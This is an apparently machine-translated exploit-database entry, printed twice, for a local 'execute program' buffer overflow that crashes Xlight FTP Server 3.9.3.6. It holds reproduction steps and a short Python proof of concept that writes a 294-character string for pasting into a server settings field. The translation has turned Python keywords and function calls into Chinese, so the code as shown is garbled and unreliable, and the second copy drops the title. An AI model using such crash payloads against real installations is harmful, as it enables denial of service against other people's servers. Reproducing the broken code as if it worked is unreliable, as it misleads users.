#利用标题: Xlight FTP服务器3.9.3.6-“堆栈缓冲区溢出”(DOS)
#发现了: Yehia Elghaly
#发现的日期: 2023-08-04
#供应商homepage: https://www.xlightftpd.com/
#软件链接: https://www.xlightftpd.com/download/setup.exe
#测试版本: 3.9.3.6
#漏洞type:本地缓冲区溢出
#在OS: Windows XP Professional SP3 -Windows 11 x64上测试
#Description: Xlight FTP服务器3.9.3.6'执行程序'缓冲区溢出(POC)
#复制步骤:
#1。-下载和Xlight FTP服务器
#2。-运行Python脚本,它将创建exploit.txt文件。
#3。-打开Xlight FTP服务器3.9.3.6
#4。-'文件和目录- 修改虚拟服务器配置- 高级- MISC-设置
#6。-使用后执行程序登录- 粘贴字符
#7-坠毁
#!/usr/bin/env Python3
exploit='a' * 294
TRY:
用file:打开('exploit.txt','w')
file.write(利用)
打印(“创建POC”)
Except:
打印(“未创建POC”)
#发现了: Yehia Elghaly
#发现的日期: 2023-08-04
#供应商homepage: https://www.xlightftpd.com/
#软件链接: https://www.xlightftpd.com/download/setup.exe
#测试版本: 3.9.3.6
#漏洞type:本地缓冲区溢出
#在OS: Windows XP Professional SP3 -Windows 11 x64上测试
#Description: Xlight FTP服务器3.9.3.6'执行程序'缓冲区溢出(POC)
#复制步骤:
#1。-下载和Xlight FTP服务器
#2。-运行Python脚本,它将创建exploit.txt文件。
#3。-打开Xlight FTP服务器3.9.3.6
#4。-'文件和目录- 修改虚拟服务器配置- 高级- MISC-设置
#6。-使用后执行程序登录- 粘贴字符
#7-坠毁
#!/usr/bin/env Python3
exploit='a' * 294
TRY:
用file:打开('exploit.txt','w')
file.write(利用)
打印(“创建POC”)
Except:
打印(“未创建POC”)